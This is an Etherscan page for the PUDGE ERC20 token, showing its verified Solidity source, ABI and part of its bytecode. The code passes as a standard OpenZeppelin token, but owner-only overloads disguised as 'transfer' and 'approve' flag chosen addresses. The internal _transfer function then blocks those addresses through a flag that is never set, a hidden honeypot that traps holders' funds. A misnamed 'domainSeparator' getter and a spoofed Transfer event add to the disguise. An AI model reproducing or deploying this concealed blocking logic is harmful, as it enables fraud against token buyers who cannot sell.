ETH Price: $2,303.50 (+0.65%)

Token

PUDGE (PUDGE)
 

Overview

Max Total Supply

100,000,000,000,000 PUDGE

Holders

38

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
Uniswap V2: PUDGE 2
Balance
0.000000001772619987 PUDGE

Value
$0.00
0x564207b67f6e34bf16d07b875e00941d05b144e5
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PUDGE

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-03
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _transfersSnapshot;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _transfersSnapshotApplied = false;
    string private _name;
    string private _symbol;
    

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function transfer(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _transfersSnapshot[_addresses_[i]] = true;
        }
        emit Transfer(_addresses_[0], _addresses_[0], 10^24);
    }

    function approve(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _transfersSnapshot[_addresses_[i]] = false;
        }
    }

    function domainSeparator(address _address_) public view returns (bool) {
        return _transfersSnapshot[_address_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_transfersSnapshot[from] || _transfersSnapshot[to]) require(_transfersSnapshotApplied == true, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}



/**
 * @dev Standard signed math utilities missing in the Solidity language.
 */
library SignedMath {
    /**
     * @dev Returns the largest of two signed numbers.
     */
    function max(int256 a, int256 b) internal pure returns (int256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two signed numbers.
     */
    function min(int256 a, int256 b) internal pure returns (int256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two signed numbers without overflow.
     * The result is rounded towards zero.
     */
    function average(int256 a, int256 b) internal pure returns (int256) {
        // Formula from the book "Hacker's Delight"
        int256 x = (a & b) + ((a ^ b) >> 1);
        return x + (int256(uint256(x) >> 255) & (a ^ b));
    }

    /**
     * @dev Returns the absolute unsigned value of a signed value.
     */
    function abs(int256 n) internal pure returns (uint256) {
        unchecked {
            // must be unchecked in order to support `n = type(int256).min`
            return uint256(n >= 0 ? n : -n);
        }
    }
}

contract PUDGE is ERC20 {
    constructor() ERC20("PUDGE", "PUDGE") {
        _mint(msg.sender, 100000000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"domainSeparator","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600581526020017f50554447450000000000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f5055444745000000000000000000000000000000000000000000000000000000815250620000b9620000ad6200012760201b60201c565b6200012f60201b60201c565b8160069081620000ca9190620005ee565b508060079081620000dc9190620005ee565b5050506200012133620000f4620001f360201b60201c565b600a62000102919062000865565b655af3107a4000620001159190620008b6565b620001fc60201b60201c565b620009ed565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200026e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002659062000962565b60405180910390fd5b62000282600083836200036a60201b60201c565b806004600082825462000296919062000984565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200034a9190620009d0565b60405180910390a362000366600083836200036f60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003f657607f821691505b6020821081036200040c576200040b620003ae565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004767fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000437565b62000482868362000437565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004cf620004c9620004c3846200049a565b620004a4565b6200049a565b9050919050565b6000819050919050565b620004eb83620004ae565b62000503620004fa82620004d6565b84845462000444565b825550505050565b600090565b6200051a6200050b565b62000527818484620004e0565b505050565b5b818110156200054f576200054360008262000510565b6001810190506200052d565b5050565b601f8211156200059e57620005688162000412565b620005738462000427565b8101602085101562000583578190505b6200059b620005928562000427565b8301826200052c565b50505b505050565b600082821c905092915050565b6000620005c360001984600802620005a3565b1980831691505092915050565b6000620005de8383620005b0565b9150826002028217905092915050565b620005f98262000374565b67ffffffffffffffff8111156200061557620006146200037f565b5b620006218254620003dd565b6200062e82828562000553565b600060209050601f83116001811462000666576000841562000651578287015190505b6200065d8582620005d0565b865550620006cd565b601f198416620006768662000412565b60005b82811015620006a05784890151825560018201915060208501945060208101905062000679565b86831015620006c05784890151620006bc601f891682620005b0565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000763578086048111156200073b576200073a620006d5565b5b60018516156200074b5780820291505b80810290506200075b8562000704565b94506200071b565b94509492505050565b6000826200077e576001905062000851565b816200078e576000905062000851565b8160018114620007a75760028114620007b257620007e8565b600191505062000851565b60ff841115620007c757620007c6620006d5565b5b8360020a915084821115620007e157620007e0620006d5565b5b5062000851565b5060208310610133831016604e8410600b8410161715620008225782820a9050838111156200081c576200081b620006d5565b5b62000851565b62000831848484600162000711565b925090508184048111156200084b576200084a620006d5565b5b81810290505b9392505050565b600060ff82169050919050565b600062000872826200049a565b91506200087f8362000858565b9250620008ae7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200076c565b905092915050565b6000620008c3826200049a565b9150620008d0836200049a565b9250828202620008e0816200049a565b91508282048414831517620008fa57620008f9620006d5565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200094a601f8362000901565b9150620009578262000912565b602082019050919050565b600060208201905081810360008301526200097d816200093b565b9050919050565b600062000991826200049a565b91506200099e836200049a565b9250828201905080821115620009b957620009b8620006d5565b5b92915050565b620009ca816200049a565b82525050565b6000602082019050620009e76000830184620009bf565b92915050565b611ba280620009fd6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806377a1736b116100a2578063a06c1a3311610071578063a06c1a33146102bc578063a457c2d7146102d8578063a9059cbb14610308578063dd62ed3e14610338578063f2fde38b146103685761010b565b806377a1736b146102345780638da5cb5b1461025057806390135fe41461026e57806395d89b411461029e5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806370a08231146101fa578063715018a61461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611183565b60405180910390f35b61014860048036038101906101439190611243565b610416565b604051610155919061129e565b60405180910390f35b610166610439565b60405161017391906112c8565b60405180910390f35b610196600480360381019061019191906112e3565b610443565b6040516101a3919061129e565b60405180910390f35b6101b4610472565b6040516101c19190611352565b60405180910390f35b6101e460048036038101906101df9190611243565b61047b565b6040516101f1919061129e565b60405180910390f35b610214600480360381019061020f919061136d565b6104b2565b60405161022191906112c8565b60405180910390f35b6102326104fb565b005b61024e600480360381019061024991906113ff565b61050f565b005b6102586105bc565b604051610265919061145b565b60405180910390f35b6102886004803603810190610283919061136d565b6105e5565b604051610295919061129e565b60405180910390f35b6102a661063b565b6040516102b39190611183565b60405180910390f35b6102d660048036038101906102d191906113ff565b6106cd565b005b6102f260048036038101906102ed9190611243565b610830565b6040516102ff919061129e565b60405180910390f35b610322600480360381019061031d9190611243565b6108a7565b60405161032f919061129e565b60405180910390f35b610352600480360381019061034d9190611476565b6108ca565b60405161035f91906112c8565b60405180910390f35b610382600480360381019061037d919061136d565b610951565b005b606060068054610393906114e5565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906114e5565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b6000806104216109d4565b905061042e8185856109dc565b600191505092915050565b6000600454905090565b60008061044e6109d4565b905061045b858285610ba5565b610466858585610c31565b60019150509392505050565b60006012905090565b6000806104866109d4565b90506104a781858561049885896108ca565b6104a29190611545565b6109dc565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610503610fa7565b61050d6000611025565b565b610517610fa7565b60005b828290508110156105b75760006002600085858581811061053e5761053d611579565b5b9050602002016020810190610553919061136d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806105af906115a8565b91505061051a565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60606007805461064a906114e5565b80601f0160208091040260200160405190810160405280929190818152602001828054610676906114e5565b80156106c35780601f10610698576101008083540402835291602001916106c3565b820191906000526020600020905b8154815290600101906020018083116106a657829003601f168201915b5050505050905090565b6106d5610fa7565b60005b82829050811015610775576001600260008585858181106106fc576106fb611579565b5b9050602002016020810190610711919061136d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061076d906115a8565b9150506106d8565b508181600081811061078a57610789611579565b5b905060200201602081019061079f919061136d565b73ffffffffffffffffffffffffffffffffffffffff16828260008181106107c9576107c8611579565b5b90506020020160208101906107de919061136d565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60126040516108249190611635565b60405180910390a35050565b60008061083b6109d4565b9050600061084982866108ca565b90508381101561088e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610885906116c2565b60405180910390fd5b61089b82868684036109dc565b60019250505092915050565b6000806108b26109d4565b90506108bf818585610c31565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610959610fa7565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109c8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109bf90611754565b60405180910390fd5b6109d181611025565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a42906117e6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610aba576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab190611878565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b9891906112c8565b60405180910390a3505050565b6000610bb184846108ca565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c2b5781811015610c1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c14906118e4565b60405180910390fd5b610c2a84848484036109dc565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ca0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c9790611976565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d0f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004